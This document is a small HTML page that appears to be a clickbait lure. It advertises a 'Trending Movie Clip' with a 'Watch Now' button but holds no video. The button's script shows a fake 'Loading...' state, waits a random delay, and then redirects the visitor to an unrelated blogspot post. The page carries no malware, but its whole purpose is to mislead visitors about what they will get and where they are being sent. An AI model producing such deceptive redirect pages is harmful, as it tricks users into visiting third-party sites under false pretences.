
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>ote jalaludin</title>

<style>
body {
    font-family: Arial;
    background: #0f172a;
    color: white;
    text-align: center;
    padding: 30px;
}
.container {
    max-width: 400px;
    margin: auto;
}
button {
    padding: 15px;
    width: 100%;
    background: red;
    color: white;
    border: none;
    font-size: 18px;
    border-radius: 5px;
}
</style>
</head>

<body>

<div class="container">
    <h2>🔥 Trending Movie Clip</h2>
    <p>This scene is going viral right now...</p>
<button onclick="goNext()">▶ Watch Now</button>
</div>
<script>
function goNext() {
    document.querySelector("button").innerText = "Loading...";
    
    setTimeout(() => {
        window.location.href = "https://marijaserifovic-ofc.blogspot.com/2024/02/blog-post.html";
    }, 1500 + Math.random() * 2000);
}
</script>

</body>
</html>
